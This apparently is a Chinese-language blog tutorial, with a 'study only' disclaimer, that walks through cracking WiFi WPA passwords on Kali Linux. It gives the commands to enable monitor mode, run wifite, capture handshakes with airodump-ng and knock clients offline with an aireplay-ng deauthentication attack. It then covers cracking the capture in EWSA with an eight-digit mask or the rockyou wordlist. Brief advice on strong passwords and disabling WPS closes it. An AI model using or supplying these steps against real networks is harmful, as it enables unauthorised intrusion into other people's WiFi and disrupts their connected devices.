注:仅用来学习研究和教育,勿用于其他用途。
准备工作
安装 hcxdumptool和 hcxtools
1
2
3
4
5
# 确保网络接通,然后更新:如果使用virtualbox运行kali,则使用桥接模式,适配器类型选择电脑网卡的适配器
sudo apt update
# 安装
sudo apt install hcxdumptool hcxtools -y
网卡进入监听模式
找一张网卡,我是用的是mt7601u网卡
1
2
3
4
5
6
7
8
# 确保使用的是usb网卡的适配器,如果使用virtualbox运行kali,则使用桥接模式,适配器类型选择usb网卡
sudo su //进入root模式
airmon-ng check kill //杀掉wifi连接
iwconfig //查看网卡,如网卡是wlan0
airmon-ng start wlan0 //启动wlan
方式
方式一:wifite自动化工具
1
wifite // 扫描wifi,并使用ctrl+c,输入选择的wifi序号,等待结果。如需要指定字典包则wifite --dict ./xx.txt
如PIN能破解则自动出密码,
如有握手包,则会放到hs/handshake_xxx中,可将握手包拿到EWSA中进行破解
(*优先考虑)方式二:aircrack-ng
1
2
3
4
5
6
7
8
9
10
11
12
13
14
扫描wifi,并获得wifi的MAC
airodump-ng wlan0
# 监听握手包
sudo airodump-ng --bssid [路由器的BSSID] -c [频道号] -w [保存的文件名] wlan0
# 如果路由器 MAC 是 AA:BB:CC:DD:EE:FF,频道是 6
sudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w xxx_handshake wlan0
# 新开terimimal 将客户端踢下线重连以获得握手包
sudo aireplay-ng -0 5 -a [路由器的BSSID] -c [客户端的BSSID] wlan0
# 回到第一个终端窗口,观察屏幕右上角。如果看到以下字样:
WPA Handshake: AA:BB:CC:DD:EE:FF
# 则抓取成功了! 握手包已经保存到了刚才命名的 xxx_handshake-01.cap 文件中
得到的握手包拿到windows平台使用EWSA进行破解,首先使用
-
掩码:
八位数字:?d?d?d?d?d?d?d?d
-
字典: 解压缩 gzip -d /usr/share/wordlist/rockyou.txt.gz,然后将该字典拿来使用。 也可以下载其他常用字典。
方式三:fluxion
错误
1
2
3
# 如打开后显示monitor mode enabled,但airmon-ng进行监听不到任何网络。
# virtualbox时,尝试将usb网卡拔出,重新插入,运行:
sudo systemctl restart NetworkManager
反思WIFI安全
- WIFI密码不要设置纯数字,需要含数字+字母+特殊符号
- 关闭QSS(又称WPS),该功能会设置PIN码来连接WIFI,容易被破解。
